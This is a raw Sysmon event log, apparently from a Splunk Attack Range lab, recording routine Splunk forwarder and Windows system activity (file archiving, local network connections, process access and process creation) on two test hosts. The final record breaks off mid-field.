23542300x8000000000000000213773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:11.539{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99ACC410DA31BA2733D7C469D2EA9C45,SHA256=5B58AC895A9DF6AF8B4364DC4744EDDAE4C708178E3BE2549853D1FE9A00D79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:12.860{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F24D2F2A3705FD727CCB45BAA578DA88,SHA256=059839087619AB777DAD8F63D4FE4BCF7C65B025916E8D25C5B3A2FC7C1CCDFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:12.539{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9845CC71D36DEDAA1834B42ED741B8D7,SHA256=CFD6F09DB8ED8975CF2A27701DD213BFD0E4A4F2ACE52066CAA5E488F09F028F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:13.875{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0A5DD684955A75B4BD6F16693BB8A1F,SHA256=B52AE2C1CEB32566B7EB2F9D4C4803F968E4B67FFA0BEEDEB6AEE31F961A2206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:13.664{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471D5D1633C750262B7F9A000A343BEB,SHA256=E5B04BECA4B7D8DED7654FA42B7EDC6D42555E2039DC09618E5929677C810B5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:14.891{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=345505C795E5C9EAA0BC0A1242C78950,SHA256=F09D541D6A44455296DCDEEEA60849F7CF9ACC525468C295A3E1CC75C80437C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:12.648{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51144-false10.0.1.12-8000- 23542300x8000000000000000213776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:14.742{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04782E1AB3EA715D20EB965B57A27A3A,SHA256=2CDA3A39AB0657B013FF86A870C299C539F8BA16A9B1B975F6971749BD73C8E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:11.541{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53195-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:15.907{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E28248668883C8CF6A9C6B6E1F194CCA,SHA256=8C628099E2D8BCD112AB485AC2591C7D364EDA3E44A8070DD6820C39112744B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:15.789{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7C8E3F11BDF85A566A71F2DF9DF39D6,SHA256=EE8D21E2BAE81C14B42FC7A48BA9EF33F42A6FA0570778D3DD2511DD0A9E28A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:16.923{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A96B04A11B21906ACF6850BB288E0E6,SHA256=D60A7D3482C9058CC8D1C18EB70933718F14035018484F9FF5A11170F2C4FDBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:16.805{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF030374AA3777C299A439E2D08FDDF4,SHA256=46D6F8823295C6B8D90FA9CD6D1D10CC0CE07C1DEAD5A261411CFA6843D36376,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:17.969{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EC8DBF1F41CF3EE3FB6D16662190036,SHA256=7CF29E640F630B3D78D85930F0DC592AF1F0EA8F9AD0669CBD15967DFF5322BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:17.836{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BB6E0A685FF23823E236B2CEE49C222,SHA256=9D711217E715F1F14ED012C06340C9686915EC0E2885909B759D91C021A66435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:19.055{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E855A446D98005BF6B458CA6519A649,SHA256=C21F564744215CF4E78E5CC23D1D5F928323D73BE0E2C9DB65F6AAA83F7CD67F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:16.728{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53196-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000284714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:19.766{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DAB-6216-9304-000000003802}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:19.766{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:19.766{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:19.766{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:19.766{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:19.766{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0DAB-6216-9304-000000003802}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:19.766{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DAB-6216-9304-000000003802}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:19.767{C8EA50B7-0DAB-6216-9304-000000003802}5164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:19.016{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=637125A336FA152C6F8338DE38626318,SHA256=EA136A72FE8DB2A05F518E9CADD433CBDEFC05FB44165873A4E575E63C04D7A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.813{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D87EF74F352C87D9EB9C459AF242EE6E,SHA256=F1A9EDADD41B123FF2048EA1AB78453BFDF68012A22DD421DAD90DE0DD06FAE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.813{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD57A866B355F3CE25B7E8D703B49E2A,SHA256=EC6BC6177E0619EB67E062C16B01B8A8062C4AD2FCD3E1185E53C0D65663B6A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.610{C8EA50B7-0DAC-6216-9404-000000003802}61126028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.407{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DAC-6216-9404-000000003802}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.407{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.407{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.407{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.407{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.407{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0DAC-6216-9404-000000003802}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.407{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DAC-6216-9404-000000003802}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.407{C8EA50B7-0DAC-6216-9404-000000003802}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program 